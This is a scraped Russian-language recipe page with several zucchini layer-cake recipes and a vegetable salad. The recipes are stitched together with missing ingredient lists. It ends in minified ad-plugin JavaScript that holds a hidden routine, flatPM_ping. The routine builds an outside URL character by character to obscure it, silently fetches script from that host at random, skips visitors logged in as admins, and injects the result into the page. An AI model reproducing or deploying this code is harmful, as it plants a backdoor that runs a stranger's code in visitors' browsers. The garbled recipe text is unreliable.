Кабачковый торт с сырной начинкой рецепт

Пикантный и вкусный кабачковый торт с сыром

Кабачковый торт с сыром – это очень вкусный и необычный вариант закуски, который будет актуален для любого повода. Он хорош и сам по себе, в качестве перекуса, и как дополнение к мясным блюдам, например, к котлеткам, отбивным или курице.

Готовится такой овощной торт легко и относительно быстро, а результат в итоге получается очень вкусненьким.

Сложность: достаточно просто – не сложнее, чем пожарить обычные оладьи из кабачков

Время приготовления: не более 1 часа, но по факту меньше – примерно 30-40 минут

Ингредиенты на 1 средний тортик:

    Кабачки пускаем на терку, солим и оставляем минут на 5-10, чтобы они пустили сок. Отжимаем лишнюю влагу.

    Вбиваем яйца.

    Всыпаем муку. Я использовала 2 ложки пшеничной и 1 ложку кукурузной муки.

    Добавляем молотые специи по вкусу. Я взяла молотый перец с чесноком и паприку.

    Бросаем отруби (любые – ржаные, отрубные, гречневые). Если отруби не используете, то муки понадобится чуть больше.


    А тем временем, пока наши коржи жарятся, отварим вкрутую яйца, пустим их на терку, и натрем сыр. Сыр можно взять твердый или плавленый, а можно мелко нарезать сулугуни – обычный или копченый – с ним тоже будет очень вкусно. Чеснок пропускаем через чеснокодавилку.

    Когда все подготовлено, собираем тортик. Первый корж смазываем майонезом, посыпаем чесноком и натертым сыром.

    Накрываем вторым коржом, смазываем майонезом и чесноком, посыпаем натертыми яйцами.

    Теперь следующий корж – опять смазываем чесноком и майонезом, посыпаем сыром. И так поступаем со всеми коржами, пока они не закончатся. У меня из этого количества получилось 4 коржа.

    Последний корж тоже смазываем майонезом и посыпаем рубленым свежим укропом. Даем немного настояться.

    Вот и все, вкусный закусочный торт из кабачков готов!

    Приятного аппетита!

    Чтобы получать лучшие статьи, подпишитесь на страницы Алимеро в Яндекс Дзен, Вконтакте, Одноклассниках, Facebook и Pinterest!

    Кабачковый торт с плавленным сыром

    Время подготовки: 5 мин.

    Время приготовления: 1 час

    Кол-во порций: 12 шт.

    Ингредиенты

    Как приготовить кабачковый торт с плавленым сыром

    Сочный и ароматный закусочный кабачковый торт — очень популярное блюдо, особенно в летнее время, когда доступ к молодым и вкусным натуральным кабачкам неограничен ни высокой ценой, ни отсутствием качественных овощей. По сути это один из лучших рецептов того, что можно приготовить из этого овоща. Есть несколько видов кабачкового торта. Отличаются они в основном пропиткой. И чем она оригинальней, тем соответственно вкусней получится и само блюдо. Наш рецепт предлагает приготовить кабачковый торт с плавленым сыром. Блюдо по этому рецепту получится сытным и невероятно вкусным. Остроту и пикантность можно регулировать количеством чеснока в рецепте, а также можно добавить в него любимые специи.

    Готовится торт из кабачков с плавленым сыром довольно просто, а получается он нежным, сочным и ароматным. Это один из тех рецептов, ради которых с нетерпением ждешь следующего сезона, чтобы приготовить еще раз.

    Как приготовить “Кабачковый торт с плавленным сыром” пошагово с фото в домашних условиях

    Для приготовления кабачкового торта с плавленым сыром нам понадобятся кабачки, плавленные сырки, чеснок, майонез, укроп, мука, яйца, соль, перец, подсолнечное масло.

    Для кабачкового торта я использовал домашний майонез с французской горчицей.

    Первым делом приступим к приготовлению начинки: натрём плавленые сырки (200 г) и соединим с приготовленным майонезом (150 г), очищенным и пропущенным через чесночницу чесноком (3 зубчика), нарезанным укропом (0,5 пучка, у меня замороженный укроп).

    Дальше приступим к приготовлению кабачковых коржей: очистим кабачки (1 кг) от кожицы и натрём на тёрке с крупными отверстиями.

    Соединим кабачки, 3 яйца, 1 стакан муки, соль (1 ч. л.) и перец (0,3 ч. л.). Хорошо перемешаем.

    На горячей сковороде с маслом (70 мл) обжарим с двух сторон кабачковые коржи, выкладывая по 4-5 полных столовых ложек теста и разравнивая их по всей площади сковороды.

    В зависимости от диаметра сковороды, у вас получится 6-8 коржей.

    Каждый кабачковый корж смажем начинкой, формируя торт.

    Кабачковый торт с сырной начинкой рецепт

    Ингредиенты

    ИНГРИДИЕНТЫ МАССА КАЛОРИЙНОСТЬ (ккал. на 100 гр.)
    Кабачки 1 кг. 27
    Соль, черный молотый перец
    Яйца 2 шт. 157
    Куркума, тмин и зира по щепотке
    Растительное масло 3 ст. лож. 899
    Мука 2 ст. лож. 329
    Для начинки:
    Чеснок 2 зуб. 106
    Маринованный огурчик 1 шт.
    Красный и желтый сладкий перец по половинке 27
    Оливки без косточек 1 ст. лож.
    Веточка базилика 1 шт.
    Творожный сыр 300 г.

    Пошаговый рецепт приготовления Кабачковый торт с сырной начинкой с фото

    А готовится лакомство так:

      Почистите кабачки, порежьте в виде произвольных кусочков, а потом измельчите их блендером до однородности.

    Переложите получившуюся массу в емкость, отставьте воронку на 20 минут. По истечении отведенного времени слейте сок, который выделился.

    Теперь добавьте в кабачки муку, вбейте яйца, всыпьте пряности, соль, перец, хорошо помешайте.

    Поделите смесь на три части.

    Прогрейте сковородку с маслом, отправьте обжариваться одну часть массы, обжаривайте ее 4 минуты. Потом переверните, используя широкую лопатку, обжаривайте с другой стороны. Также пожарьте оставшиеся кабачковые смеси, получатся лепешки.

    А сейчас займемся начинкой. Возьмите перец, удалите сердцевину с семенами, мякоть порежьте небольшими кусочками. Также нарежьте огурец.

    Почистите чеснок, измельчите.

    Таким же образом поступите с оливками.

    Базилик постарайтесь порезать мелкими кусочками.

    Творожный сыр взбейте, используя вилку, смешайте с чесноком, сюда же добавьте перцы, огурчики, оливки, базилик, все смешайте.

    • Теперь складывая друг на друга лепешки из кабачков, смазывайте заготовки начинкой. Вот и все, вкуснейший, необычный кабачковый торт с сырной начинкой готов!
    • Видеорецепт Кабачковый торт с сырной начинкой

      Оригинальный салат из обжаренных овощей

      А еще можно побаловать свою семью очень вкусным, удивительным, витаминным оригинальным салатиком из обжаренных овощей!

      Итак, для того чтобы приготовить кушанье по этому рецепту вам понадобится:

      Ингредиенты:
      масло оливковое-60 мл.;
      помидоры-4 шт.;
      перец болгарский красный-3 шт.;
      баклажан-2 шт.;
      кабачок 2 шт.
      для заправки:
      масло оливковое-60 мл.;
      уксус бальзамический 1 ст.л.;
      чеснок-1 зубчик;
      петрушка-3 веточки;
      сахар-1 щепотка;
      перец черный молотый;
      соль.

      А готовится блюдо так:

      Помойте маленькие томаты, сладкий перец разных цветов, кабачки, баклажаны.

    Кабачки с баклажанами порежьте пластинами.

    Помидорчики, перец, разрежьте вдоль, а потом на 4 части, с перцев удалите семена.

    Почистите чеснок, измельчите, добавьте оливковое масло, получившейся массой полейте овощи.

    Далее займемся заправкой. Промойте петрушку, измельчите, смешайте с чесноком, сахаром. Сюда же влейте немного бальзамического уксуса, массу взбейте, используя венчик, влейте немного оливкового масла, посолите, поперчите.

    Прогрейте сковородку без масла, обжарьте баклажаны, кабачки с обеих сторон, выложите овощи на бумажное полотенце, пусть стечет жир.

  • Обжарьте помидорчики с перцем, также эти овощи выложите на полотенце. Как только продукты остынут, переложите их на блюдо, вылейте готовую заправочную массу, все помешайте и вкуснейшее овощное блюдо готово!
  • Кабачковый торт с морковью и луком

    Ингредиенты

    Лук репчатый – 1 головка

    Яйцо куриное – 1-2 шт.

    Масло подсолнечное – для жарки

    Сметана – для соуса

    Чеснок – 3 зубчика

    Петрушка – для украшения

    Помидоры – на подачу

    • 160 кКал
    • 1 ч.
    • 1 ч.

    Фото готового блюда

    Пошаговый рецепт с фото

    Кабачковый сезон подходит к концу. Закрутки из кабачков в изобилии. А значит, пора пустить кабачки на закуску.

    Предлагаю приготовить вкуснейший закусочный кабачковый торт с морковью и луком. Наш несладкий торт готовится из кабачковых блинов, смазанных чесноком со сметаной и пропитанных жареным луком и морковью. Блюдо подойдет к праздничному летнему столу.

    Продукты возьмите из списка.

    Кабачки необходимо очистить от кожуры. Затем удалите середину вместе с семенами и мякотью. Порежьте кабачки кусочками. Очистите репчатый лук, морковь и чеснок.

    Пропустите кабачки через крупную терку. Выложите в миску, предварительно отжав сок.

    Разбейте в миску с кабачками два куриных яйца.

    Взбейте кабачки с яйцом венчиком. Приправьте солью.

    Перемешайте кабачковое тесто до образования густой блинной массы.

    Разогрейте сковороду. Желательно взять небольшую блинную сковородку. Смажьте маслом. Вылейте маленький половничек кабачкового теста в сковородку. Распределите ложкой по всей жарочной поверхности. Выпекайте кабачковый блинчик с двух сторон до готовности.

    Блинчики складывайте на блюдо.

    Пока жарятся блины из кабачков, приготовьте морковно-луковую начинку. В отдельной сковороде обжарьте на подсолнечном масле репчатый лук, а затем морковь. Лук и морковь предварительно потрите на крупной терке. Начинку посолите по вкусу и остудите.

    Смажьте блинчик сметаной с тертым чесноком.

    Поверх распределите морковную начинку. Далее снова блинчик, сметана с чесноком и морковь с луком.

    Прослаивайте торт начинкой, пока не закончатся блины.

    Поверхность закусочного торта украсьте свежей петрушкой. Кабачковым торт с морковью и луком готов! Подайте этот необычный тортик к столу в теплом или в охлажденном виде на закуску.

    Нежный, ароматный, полезный и питательный кусочек торта – ммм, большая вкуснятина. Блинный торт из кабачков идеально сочетается с помидорами. Также на сайте есть рецепт кабачкового торта с помидорами и сыром.

    Ссылка на основную публикацию
    Adblock
    detector
    ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
    '+c+"
    "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
    Закрыть через '+o.how.outgoing.timer_count+"
    ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
    '+c+"
    ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
    '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
    "],tbody:[1,"","
    "],colgroup:[2,"","
    "],col:[3,"","
    "],tr:[2,"","
    "],td:[3,"","
    "],th:[3,"","
    "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
    '+a+" через "+o+'
    '+n+'
    ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
    ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};